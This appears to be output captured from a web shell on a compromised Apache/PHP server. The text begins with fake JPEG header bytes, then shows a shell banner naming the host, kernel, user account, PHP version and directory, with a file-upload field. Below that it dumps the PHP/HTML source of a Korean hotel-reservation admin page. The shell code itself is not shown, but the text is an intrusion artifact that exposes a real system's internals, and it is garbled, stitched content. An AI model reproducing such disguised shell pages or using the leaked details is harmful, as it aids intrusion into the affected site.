ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/admin/reservation/ |
Upload File : |
<? include "../include/top.html"; include "_common.php"; ?> <div class="contents_wrap"> <div class="contents_wrap_in"> <div class="title">대리점예약_예약관리</div> <div class="contents_detail"> <div class="c_top_bar"> <div class="bar_wrap"> <img src="../image/btn/btn_excel01.gif" alt="현재페이지 엑셀저장" /> <img src="../image/btn/btn_excel02.gif" alt="전체페이지 엑셀저장" /> </div> </div> <div class="reserve_wrap"> <table width="100%" border="0" cellspacing="0" cellpadding="0" class="t_r_register"> <thead> <tr> <td colspan="2" class="t_top_line"></td> </tr> <tr> <td colspan="2" class="top_txt2">예약검색</td> </tr> </thead> <tbody> <tr> <th width="80">기간</th> <td class="input_lo"> <input name="r_date" id="r_date" type="radio" value="" /><label for="r_date">예약일</label> <input name="e_data" id="e_data" type="radio" value="" /><label for="e_data">입실일</label><br/> <ul class="btn_day"> <li>오늘</li> <li>어제</li> <li>지난7일</li> <li>지난15일</li> <li>이번달</li> <li>지난달</li> </ul> <div class="lo_left"> <div class="lo_left calendar_wrap"> <input name="" id="" type="text" class="calendar_input" size="12" onclick="AjaxCal(this,event);" onkeyup="OnDateStyle(this)" value="<?=$row[gre_birth]?>" readonly/><img src="../image/btn/btn_calendar.gif" align="top" class="calendar_btn" /> </div> <span class="lo_left prl5">~</span> <div class="lo_left calendar_wrap"> <input name="" id="" type="text" class="calendar_input" size="12" onclick="AjaxCal(this,event);" onkeyup="OnDateStyle(this)" value="<?=$row[gre_birth]?>" readonly/><img src="../image/btn/btn_calendar.gif" align="top" class="calendar_btn" /> </div> </div> </td> </tr> <tr> <th>예약상태 검색</th> <td> <div class="input_lo"> <input name="all" id="all" type="radio" value="" /><label for="all">전체<span class="c_gray">(110)</span></label> <input name="receipt" id="receipt" type="radio" value="" /><label for="receipt">접수<span class="c_gray">(10)</span></label> <input name="check" id="check" type="radio" value="" /><label for="check">확인중<span class="c_gray">(3)</span></label> <input name="ok" id="ok" type="radio" value="" /><label for="ok">확정<span class="c_gray">(7)</span></label> <input name="finish" id="finish" type="radio" value="" /><label for="finish">완료<span class="c_gray">(7)</span></label> <input name="cancel" id="cancel" type="radio" value="" /><label for="cancel">취소<span class="c_gray">(2)</span></label> <input name="stand" id="stand" type="radio" value="" /><label for="stand">대기예약<span class="c_gray">(3)</span></label> </div> <div class="mt7 clear"> <select name="jumpMenu" id="jumpMenu" onchange="MM_jumpMenu('parent',this,0)" class="lo_left top_input mr5"> <option>예약자명</option> <option>예약자명</option> <option>예약자명</option> <option>예약자명</option> </select> <div class="lo_left"> <input class="search_box search_box_bg" id="search_word" name="search_word" type="text" /><input type="image" src="../image/btn/btn_search.gif" align="top" alt="검색" class="input_img" /> </div> </div> </td> </tr> </tbody> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0" class="t_r_list mt20"> <thead> <tr> <td colspan="11" class="t_top_line"></td> </tr> <tr> <th width="80">대리점명</th> <th width="80">접수번호</th> <th width="100">예약일</th> <th width="65">예약상태</th> <th width="80">입실일</th> <th width="80">퇴실일</th> <th>호텔명</th> <th width="120">숙박일/객실수/예약계</th> <th width="65">금액</th> <th width="65">접수자</th> <th width="65">바우처</th> </tr> </thead> <tbody> <tr> <td>하나투어</td> <td>H20130420</td> <td>2013.04.20 17:00</td> <td>접수</td> <td>2013.04.20</td> <td>2013.04.20</td> <td class="t_hotel_name">롯데호텔</td> <td>10/1/3</td> <td>170,000</td> <td>김서울</td> <td>발송</td> </tr> </tbody> </table> </div> </div> </div> </div> <? include "../include/footer.html" ?>